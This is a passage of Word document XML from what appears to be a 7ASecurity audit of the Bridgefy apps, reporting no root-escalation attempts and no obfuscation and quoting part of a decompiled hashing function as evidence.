          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Unclear</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>summarizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>answer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>question:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="372" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q12: Do the apps attempt to gain root access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>through</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android/iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>vulnerabilities or in other ways?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In a similar fashion to the approach followed to answer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q11</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, 7ASecurity performed multiple attempts to identify code, binary artifacts and dependencies that might result in the apps gaining root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Once again, the audit team was unable to find any potential root privilege escalation either via direct prompts in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>rooted/jailbroken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>through</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of system vulnerabilities. Instead, all applications were found to respect their limited privileges in the expected manner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This being said, user trust may additionally be improved by extrapolating the mitigation guidance offered under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q07</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250001" w:id="54"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-Q13:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>appear</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Obfuscation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Unclear</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>summarizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>answer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>question:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="377" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q13: Do the apps use obfuscation techniques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>hide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>directories?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity was unable to identify any client or server code, binary artifact or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>dependency using obfuscation to hide suspicious code during this assignment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>short, no evidence could be found in the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>apps,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>applications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>suggest that any obfuscation techniques are in place to disguise malicious behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Among other techniques, when obfuscation is in place decompiled function or class names are often shortened to random strings. However, the following code snippet serves as an example that Bridgefy makes no attempt to obfuscate its source code to hide nefarious activity:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Decompiled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>src/me/bridgefy/license/internal/LicenseManagerImpl.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Decompiled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="1511" w:right="3742" w:hanging="792"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>generateHash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>arrby)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ block3 : {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1907" w:right="4802" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MessageDigest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>messageDigest; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>try </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="2303" w:right="1243" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>messageDigest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MessageDigest.getInstance((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
